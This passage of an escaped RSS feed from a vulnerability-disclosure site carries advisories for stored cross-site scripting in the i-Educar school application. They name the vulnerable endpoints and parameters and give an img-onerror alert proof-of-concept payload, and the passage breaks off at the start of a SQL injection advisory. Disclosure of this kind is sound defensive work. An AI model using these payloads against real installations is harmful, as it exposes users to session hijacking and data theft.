    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9652</title>
        <link>https://www.cvehunters.com/p/cve-2025-9652/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9652/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9652-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_transferencia_tipo_cadphp&amp;#34;&amp;gt;CVE-2025-9652: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9652-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_transferencia_tipo_cadphp&amp;#34;&amp;gt;CVE-2025-9652: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9652&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_transferencia_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Other Affected Endpoint: &amp;lt;code&amp;gt;/intranet/educar_transferencia_tipo_det.php?cod_transferencia_tipo=[id]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;desc_tipo&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image.png&amp;#34;
	width=&amp;#34;741&amp;#34;
	height=&amp;#34;592&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image_hu_c6ccac438811cb73.png 480w, /p/cve-2025-9652/image_hu_f23a6e3e10957c05.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;125&amp;#34;
		data-flex-basis=&amp;#34;300px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image-1.png&amp;#34;
	width=&amp;#34;738&amp;#34;
	height=&amp;#34;341&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image-1_hu_45b054bc4c59654b.png 480w, /p/cve-2025-9652/image-1_hu_4ed8f53b57d99036.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image-2.png&amp;#34;
	width=&amp;#34;690&amp;#34;
	height=&amp;#34;281&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image-2_hu_c194e94dc6a4b0fd.png 480w, /p/cve-2025-9652/image-2_hu_8375d7eb45ee1d31.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;245&amp;#34;
		data-flex-basis=&amp;#34;589px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9652/image-3.png&amp;#34;
	width=&amp;#34;661&amp;#34;
	height=&amp;#34;317&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9652/image-3_hu_8eb960a4b7cdc869.png 480w, /p/cve-2025-9652/image-3_hu_439d0daf74e59258.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;208&amp;#34;
		data-flex-basis=&amp;#34;500px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9653</title>
        <link>https://www.cvehunters.com/p/cve-2025-9653/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9653/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9653-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_projeto_cadphp&amp;#34;&amp;gt;CVE-2025-9653: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;observacao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_projeto_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9653-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_projeto_cadphp&amp;#34;&amp;gt;CVE-2025-9653: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9653&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_projeto_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;observacao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_projeto_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;observacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;observacao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9653/image.png&amp;#34;
	width=&amp;#34;679&amp;#34;
	height=&amp;#34;308&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9653/image_hu_ff92ad4a0e5a10c8.png 480w, /p/cve-2025-9653/image_hu_874ab00290986bd0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;220&amp;#34;
		data-flex-basis=&amp;#34;529px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9653/image-1.png&amp;#34;
	width=&amp;#34;649&amp;#34;
	height=&amp;#34;281&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9653/image-1_hu_767cf2003758e659.png 480w, /p/cve-2025-9653/image-1_hu_3ac528eecbe71f7b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;230&amp;#34;
		data-flex-basis=&amp;#34;554px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9653.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9531</title>
        <link>https://www.cvehunters.com/p/cve-2025-9531/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9531/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9531-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agendaphp-endpoint&amp;#34;&amp;gt;CVE-2025-9531: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9531-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agendaphp-endpoint&amp;#34;&amp;gt;CVE-2025-9531: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
